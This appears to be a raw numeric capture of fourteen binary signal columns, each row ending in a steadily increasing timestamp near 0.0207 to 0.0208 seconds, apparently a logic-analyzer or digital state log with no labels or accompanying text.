1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0710964e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0710988e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0711012e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0711036e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0711060e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0711084e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0711112e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0711136e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0711164e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0711188e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,2.0711192e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,2.0711236e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,2.0711260e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0711268e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0711288e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0711312e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0711336e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0711364e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0711388e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0711412e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0711436e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0711460e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0711484e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0711512e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0711536e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0711564e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0711588e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0711612e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0711660e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0711688e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0711712e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0711736e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0711764e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0711788e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0711812e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0711836e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0711860e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0711884e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0711912e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0711936e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,2.0711940e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,2.0711964e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,2.0711988e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,2.0712012e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,2.0712036e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,2.0712060e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,2.0712084e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,2.0712112e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,2.0712136e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,2.0712164e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,2.0712188e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,2.0712236e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,2.0712260e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0712268e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0712288e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0712312e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0712336e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0712364e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0712388e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0712412e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0712436e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0712460e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0712484e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0712512e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0712540e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0712564e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0712588e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0712612e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0712636e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0712660e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0712688e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0712712e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0712736e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0712764e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0712788e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0712812e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0712836e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0712860e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0712884e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0712912e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0712940e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0712964e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0712988e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0713012e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0713036e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0713060e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0713084e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0713112e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0713164e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0713188e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,2.0713192e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,2.0713236e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,2.0713260e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0713268e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0713288e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0713312e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0713336e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0713364e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0713388e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0713412e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0713436e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0713460e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0713484e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0713512e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0713536e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0713564e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0713588e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0713612e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0713636e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0713660e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0713684e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0713712e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0713736e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0713764e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0713788e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0713812e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0713860e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0713888e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0713912e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0713936e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0713964e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0713988e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0714012e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0714036e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0714060e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0714084e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0714112e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0714136e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0714164e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0714188e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0714212e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0714236e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0714260e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0714284e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0714312e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0714336e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0714364e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0714388e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0714412e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0714436e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0714460e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0714484e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0714512e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0714536e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0714564e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0714588e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0714612e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0714636e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0714660e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0714684e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0714712e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0714736e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0714764e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0714788e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0714812e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0714836e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0714860e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0714884e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0714912e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0714936e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0714964e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0714988e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0715012e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0715036e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0715060e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0715084e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0715112e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0715136e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0715164e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0715188e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0715212e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0715236e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0715260e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0715284e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0715312e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0715336e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0715364e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0715388e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0715412e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0715436e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0715460e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0715484e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0715512e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0715536e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0715564e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0715588e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0715612e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0715636e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0715660e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0715684e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0715712e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0715736e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0715764e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0715784e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0715812e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0715836e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0715860e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0715884e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0715908e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0715932e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0715960e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0715984e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0716012e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0716036e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0716060e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0716084e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0716108e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0716132e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0716160e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0716184e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0716212e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0716236e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0716260e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0716284e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0716308e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0716332e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0716360e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0716384e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0716412e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0716436e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0716460e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0716484e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0716508e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0716532e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0716560e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0716584e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0716612e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0716636e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,2.0716660e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,2.0716684e-02 1,0,1,1,0,0,0,0,0,1,0,0,0,0,2.0716688e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,2.0716692e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,1,2.0841452e-02 0,0,1,1,0,1,0,0,0,1,0,0,0,1,2.0841660e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,1,2.0841680e-02 0,1,1,1,0,1,0,0,0,1,0,1,0,1,2.0841708e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,1,2.0841732e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,1,2.0842048e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,1,2.0842072e-02 0,1,1,1,0,1,0,0,0,0,0,0,0,1,2.0842076e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,1,2.0842080e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,1,2.0842100e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,1,2.0842124e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,1,2.0842148e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,1,2.0842172e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,1,2.0842196e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,1,2.0842220e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,1,2.0842248e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,1,2.0842272e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0842284e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0842300e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0842324e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0842348e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0842372e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0842396e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0842420e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0842472e-02 0,1,1,1,0,0,0,0,0,1,0,0,0,0,2.0842500e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.0842504e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,2.0842524e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.0842548e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,2.0842596e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.0842620e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0842628e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0842648e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0842672e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0842700e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0842724e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0842748e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0842772e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0842796e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0842820e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0842848e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0842868e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0842896e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0842924e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0842948e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0842972e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0842996e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0843020e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0843048e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0843072e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0843100e-02 0,1,1,1,0,0,0,0,0,1,0,0,0,0,2.0843124e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.0843128e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,2.0843172e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.0843196e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0843204e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0843220e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0843248e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0843272e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0843296e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0843324e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0843348e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0843372e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0843396e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0843420e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0843448e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0843472e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0843500e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0843524e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0843548e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.0843552e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,2.0843596e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.0843620e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0843628e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0843648e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0843672e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0843700e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0843724e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0843748e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0843772e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0843796e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0843820e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0843848e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0843872e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0843900e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0843924e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0843948e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0843972e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0843996e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0844020e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0844048e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0844072e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0844124e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0844148e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.0844152e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,2.0844172e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.0844196e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0844204e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0844220e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0844244e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0844272e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0844300e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0844324e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0844348e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0844372e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0844396e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0844420e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0844448e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0844468e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0844496e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0844524e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0844548e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0844572e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0844596e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0844620e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0844644e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0844668e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0844692e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0844724e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0844744e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0844772e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0844796e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0844820e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0844844e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0844868e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0844892e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0844920e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0844944e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0844972e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0844996e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0845044e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0845068e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.0845076e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,2.0845092e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.0845120e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,2.0845172e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.0845196e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0845204e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0845220e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0845244e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0845268e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0845292e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0845320e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0845344e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0845368e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0845396e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0845420e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0845444e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0845468e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0845492e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0845520e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0845540e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0845568e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0845592e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0845620e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0845644e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0845668e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0845692e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0845720e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0845740e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.0845748e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,2.0845792e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.0845820e-02 0,1,1,1,0,1,0,0,0,0,0,0,0,0,2.0845824e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0845828e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0845844e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0845868e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0845892e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0845920e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0845940e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0845968e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0845992e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0846020e-02 